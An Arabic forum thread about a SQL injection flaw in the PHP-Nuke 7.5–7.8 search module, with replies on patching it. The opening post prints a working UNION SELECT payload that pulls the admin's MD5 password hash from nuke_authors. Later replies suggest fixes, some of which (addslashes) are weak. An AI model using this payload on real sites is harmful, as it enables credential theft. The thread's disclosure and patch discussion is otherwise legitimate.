النتائج 1 إلى 15 من 15

الموضوع: ثغرة جديدة في مجلة النيوك

  1. #1
    Banned
    تاريخ التسجيل
    Nov 2005
    المشاركات
    8

    ثغرة جديدة في مجلة النيوك



    السلام عليكم
    اخواني /اخواتي
    ثغرة جديدة في مجلة النيوك في محرك البحث حق المجلة

    وتستخرج لك الثغرة باسورد الادمن مشفر بـ md5

    للترقية من الثغرة قم بالترقية الى اخر اصدار وهوه 7.9

    طريقة عمل الثغرة ضع في مجرك البحث الكود التالي وسوف يخرج لك الباسورد مشفر للادمن

    p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*

    الاصدارت المصابة هي
    7.5, 7.6, 7.7 7.8
    والسلام عليكم







  2. #2
    عضو نشيط جدا
    تاريخ التسجيل
    Feb 2004
    المشاركات
    318


    السلام عليكم

    تنويه فقط اخوي هي تستعمل عن طريق SQL Injection بالتالي تم اصلاحها والمعروف ان
    SQL Injection توجد له امكانيات خطيرة في اغلب البرامج والسكربتات

    بالتوفيق






  3. #3
    عضو فعال جدا
    تاريخ التسجيل
    Oct 2003
    المشاركات
    2,495


    راحت عليها النيوك
    ضاع مجهودي سنين بسببها





    __________________
    عربي وافتخر

    بعض مواضيعي في سوالف سوفت:

  4. #4
    عضو سوبر نشيط
    تاريخ التسجيل
    Oct 2003
    المشاركات
    641


    والله فعلاً الثغرة صحيحة .. لكن الباسوورد للأدمن تظهر مشفرة مثل ما ذكرت بـ md5 لكن هل من السهولة فك كلمة السر المشفرة بـ md5 هذه ؟؟!!

    أعتقد صعب جداً وأيضاً تحتاج إلى وقت طويل .. لكن ليس بمستحيل مع وجود بعض البرامج التي تقوم بالتخمين .. والله المستعان !!


    أعتقد هناك حل بدل الترقية .. وهو تعديل ملف index.php في هذا المسار :

    modules/Search/index.php


    وقد رأيت تعديل هذا الملف في أحد المواقع ولكن لا أدي أين بالضبط .. أتمنى كل من يعرف الحل يذكره هنا !!






  5. #5
    عضو فعال
    تاريخ التسجيل
    Jun 2003
    المشاركات
    1,782

  6. #6
    عضو سوبر نشيط
    تاريخ التسجيل
    May 2004
    المشاركات
    953


    الثغرة شغاله والله وخطيرة
    ومجربة كمان
    يعني الحذر وبعدين وش الفايدة من البحث الغيه وريح بالك






  7. #7


    السلام عليكم ..

    فعلاً هناك ثغرة خطيرة ظهرت في الإصدارات من النيوك 7.5 إلى 7.8 في موديلز البحث تقوم بحقن قاعدة البيانات .. ولسد هذه الثغرة إما الترقية إلى الإصدارة الأخيرة من النيوك 7.9 أو القيام بتعديل بسيط في ملف الـ index.php في موديلز البحث .

    والطريقة هي كالتالي .. إفتح ملف index.php على المسار التالي :

    modules/Search/index.php

    ثم إبحث عن هذا السطر ( تقريباً السطر 167 ) :

    كود PHP:
    $query stripslashes(check_html($query"nohtml"));
            if (
    $type=="stories" OR !$type) { 
    وعدله إلى التالي :

    كود PHP:
    $query addslashes($query);
            if (
    $type=="stories" OR !$type) { 
    وأخيراً قم بحفظ الملف .. وبذلك يتم سد هذه الثغرة الخطيرة






  8. #8
    عضو سوبر نشيط
    تاريخ التسجيل
    Nov 2005
    المشاركات
    953


    يتم استبدال الملف بالمسار
    modules/Search/index.php
    بالملف الموجود بالمرفقات
    ####
    هذا بالنسبة للموديول الافتراضى Search , اما بالنسبة لموديول البحث المتقدم SearchEnhanced
    فلم اعرف تعديله الى الآن , لو هناك من يستطيع سد ثغرته يخبرنا





    الملفات المرفقة الملفات المرفقة
    __________________
    اللهم لك الحمد و لك الشكر كما ينبغى لجلال وجهك وعظيم سلطانك
    اللهم أحسن خاتمتنا
    اللهم توفنى فى أشرف الزمان والمكان ..
    المصحف المُعلم مجاناً جاهز للتحميل الآن !

  9. #9


    اقتباس المشاركة الأصلية كتبت بواسطة ahdaf.net
    يتم استبدال الملف بالمسار
    modules/Search/index.php
    بالملف الموجود بالمرفقات

    هذا بالنسبة للموديول الافتراضى Search
    أنت لم تذكر هذا الملف لأي إصدار فليس هناك ملف إفتراضي لكل إصدارات النيوك لأن هذا الملف قد يحتوي على تعديلات معينة بحسب إصدارة النيوك وهي قد تختلف من إصدار إلى إصدار !!

    لذلك فالأفضل تعديل الملف يدوياً ( وهو سطر واحد فقط ) بدل استبداله حتى لا تحصل مشاكل محتملة أو أخطاء !!






  10. #10
    عضو نشيط جدا
    تاريخ التسجيل
    May 2004
    المشاركات
    399


    والله غريبة هذي المجلة





    __________________
    وفقنا الله وإياكم لكل خير
    سأصبر حتى يعجز الصبر عن صبري
    وأصبر حتى يحكم الله في أمري
    وأصبر حتى يعلم الصبر أنني
    صبرت على شيء أمر من الصبر

  11. #11
    خبير سيرفرات لينكس
    تاريخ التسجيل
    Mar 1999
    المشاركات
    4,917


    مجلة من دون بواب


    اقول فكك منها يا رجال مجلة هي اصلا وجودها عبارة عن ثغرة في عالم المجلات .
    يا رجال صار كل موقع تصممة يقولن لك هذا مو نيوك .......... ههههههههههههه ويكون كود مكتوب بيدك .






  12. #12
    عضو نشيط جدا
    تاريخ التسجيل
    Aug 2004
    المشاركات
    317


    طيب وش الفايدة فك الباسورد المشفر صعب جدا






  13. #13
    عضو سوبر نشيط
    تاريخ التسجيل
    Nov 2005
    المشاركات
    953


    صعب لكنه ليس مستحيل





    __________________
    اللهم لك الحمد و لك الشكر كما ينبغى لجلال وجهك وعظيم سلطانك
    اللهم أحسن خاتمتنا
    اللهم توفنى فى أشرف الزمان والمكان ..
    المصحف المُعلم مجاناً جاهز للتحميل الآن !

  14. #14
    عضو نشيط
    تاريخ التسجيل
    Jun 2004
    المشاركات
    262


    اخوي ArabOasis.Net

    بارك الله فيك لحل هذي المشكله وجزاك الله خير





    __________________
    لاتقل مستحيل قبل ان تجرب

  15. #15


    السلام عليكم

    الحل سهل جدا ( زياده على الي فوق ) وللحمايه لاي شخص يريد ان يبني محرك بحث او يستقبل استعلامات من المستخدم

    متغير الاستعلام الي هو $query

    استخدم معه الداله

    mysql_real_escape_string($query) وسوف تقوم بحل المشكله


    معلومات عن الداله

    http://www.php.net/manual/en/functio...ape-string.php

    تحياتي





    __________________
    محمد الرحيلي
    http://www.alrehaili.net
    http://www.arccn.net
    http://www.mafgod.com
    mohammad@arccn.net





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض